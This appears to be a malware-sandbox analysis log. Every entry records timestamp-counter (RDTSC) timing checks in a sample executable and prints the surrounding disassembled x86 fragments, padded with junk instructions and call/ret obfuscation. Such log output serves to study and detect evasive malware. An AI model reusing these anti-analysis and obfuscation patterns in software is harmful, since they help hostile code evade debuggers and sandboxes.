Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC2E8 second address: CBC2FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F3780CDC712h 0x0000000f je 00007F3780CDC70Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB482 second address: CBB487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB487 second address: CBB4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC711h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F3780CDC70Ch 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD1C1 second address: CBD261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007F3780D2BA66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F3780D2BA6Ch 0x00000014 nop 0x00000015 jmp 00007F3780D2BA6Ch 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F3780D2BA68h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 and bl, FFFFFFCAh 0x00000039 jmp 00007F3780D2BA6Ah 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F3780D2BA68h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 0000001Dh 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a push ebx 0x0000005b sub dword ptr [ebp+122D1E3Ch], esi 0x00000061 pop ebx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push edx 0x00000067 pop edx 0x00000068 jmp 00007F3780D2BA73h 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBE3F5 second address: CBE414 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F3780CDC711h 0x00000014 jmp 00007F3780CDC70Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD3B5 second address: CBD3D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3780D2BA74h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007F3780D2BA6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBE414 second address: CBE41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD3D7 second address: CBD3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3780D2BA76h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1CE3 second address: CC1D9B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F3780CDC718h 0x00000013 jmp 00007F3780CDC70Eh 0x00000018 popad 0x00000019 jmp 00007F3780CDC713h 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007F3780CDC717h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D1CD1h], ecx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F3780CDC708h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 jp 00007F3780CDC70Ch 0x00000059 mov dword ptr [ebp+122D1DA5h], esi 0x0000005f mov bx, 15B1h 0x00000063 mov eax, dword ptr [ebp+122D1009h] 0x00000069 push FFFFFFFFh 0x0000006b mov edi, 29D84E00h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1D9B second address: CC1D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1D9F second address: CC1DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1DA3 second address: CC1DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC2E0C second address: CC2E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3780CDC706h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4A93 second address: CC4AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ebx 0x0000000b and ebx, dword ptr [ebp+122D376Bh] 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 mov bh, BFh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F3780D2BA68h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 cld 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4AE1 second address: CC4AE7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC6A6C second address: CC6A8B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3780D2BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3780D2BA73h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7A13 second address: CC7A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7A18 second address: CC7A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7A1E second address: CC7A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7A22 second address: CC7A42 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F3780D2BA6Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F3780D2BA66h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7A42 second address: CC7A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4CE3 second address: CC4CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC5CD2 second address: CC5D4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F3780CDC711h 0x0000000d nop 0x0000000e mov ebx, dword ptr [ebp+122D39A7h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F3780CDC708h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov eax, dword ptr [ebp+122D1385h] 0x00000042 call 00007F3780CDC711h 0x00000047 sub edi, 775E8C8Ah 0x0000004d pop ebx 0x0000004e push FFFFFFFFh 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pop esi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3CBD second address: CC3CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8AB0 second address: CC8B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F3780CDC708h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 jmp 00007F3780CDC70Bh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F3780CDC708h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov di, dx 0x00000045 push 00000000h 0x00000047 and edi, dword ptr [ebp+122D38EBh] 0x0000004d push eax 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3D90 second address: CC3D9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC6B83 second address: CC6B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCAB9F second address: CCABAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCE0E4 second address: CCE0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD236D second address: CD2379 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3780D2BA6Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2379 second address: CD2388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3780CDC731h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2388 second address: CD2394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3780D2BA66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD7293 second address: CD7298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD7298 second address: CD729E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB073 second address: CDB09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3780CDC706h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F3780CDC70Dh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F3780CDC70Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB09F second address: CDB0A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB0A5 second address: CDB0B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push ecx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68C0E second address: C68C20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F3780D2BA66h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68C20 second address: C68C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3780CDC706h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68C2C second address: C68C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF54D second address: CDF567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3780CDC713h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFBA7 second address: CDFBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3780D2BA75h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFBC5 second address: CDFBC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFF9C second address: CDFFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFFA0 second address: CDFFF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3780CDC70Ch 0x0000000c jne 00007F3780CDC706h 0x00000012 push eax 0x00000013 jmp 00007F3780CDC712h 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jmp 00007F3780CDC718h 0x00000022 pop ecx 0x00000023 jmp 00007F3780CDC713h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFFF6 second address: CE000B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3780D2BA71h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE000B second address: CE001B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3780CDC706h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE001B second address: CE001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2DD7 second address: CE2DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3780CDC716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAD53 second address: CEAD5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAD5A second address: CEAD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3780CDC70Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAD6D second address: CEAD9B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3780D2BA66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d js 00007F3780D2BA66h 0x00000013 js 00007F3780D2BA66h 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3780D2BA6Dh 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEB32A second address: CEB355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3780CDC70Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edi 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAA6D second address: CEAA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEAA71 second address: CEAA77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEB7DB second address: CEB7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3780D2BA6Ch 0x0000000a jbe 00007F3780D2BA6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEB7FC second address: CEB800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEB958 second address: CEB95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBABE second address: CEBAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3780CDC717h 0x00000009 jmp 00007F3780CDC715h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBD94 second address: CEBD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBD99 second address: CEBDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBDA1 second address: CEBDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEBDA5 second address: CEBDC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3780CDC70Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edi 0x00000013 push edi 0x00000014 jne 00007F3780CDC706h 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF062B second address: CF0635 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3780D2BA66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF0635 second address: CF0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jg 00007F3780CDC706h 0x0000000d jno 00007F3780CDC706h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB862B second address: CB8664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F3780D2BA78h 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F3780D2BA66h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB89C9 second address: CB89CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8AEA second address: CB8B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780D2BA77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8B0B second address: CB8B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8BB5 second address: CB8BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8BB9 second address: CB8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8CFE second address: CB8D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8D04 second address: CB8D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3780CDC719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push ebx 0x0000000b jp 00007F3780CDC71Eh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 js 00007F3780CDC706h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9361 second address: CB9366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB96B0 second address: CB96C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F3780CDC708h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB96C5 second address: CB96CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB96CB second address: CB9750 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3780CDC706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F3780CDC708h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push esi 0x00000028 jmp 00007F3780CDC712h 0x0000002d pop edi 0x0000002e lea eax, dword ptr [ebp+1248A216h] 0x00000034 mov dword ptr [ebp+122D5826h], edi 0x0000003a push eax 0x0000003b pushad 0x0000003c jns 00007F3780CDC70Ch 0x00000042 jbe 00007F3780CDC708h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b mov dword ptr [esp], eax 0x0000004e sub dword ptr [ebp+122D369Dh], esi 0x00000054 lea eax, dword ptr [ebp+1248A1D2h] 0x0000005a jnp 00007F3780CDC70Ch 0x00000060 mov dword ptr [ebp+122D1A02h], edx 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a push edx 0x0000006b pop edx 0x0000006c rdtsc
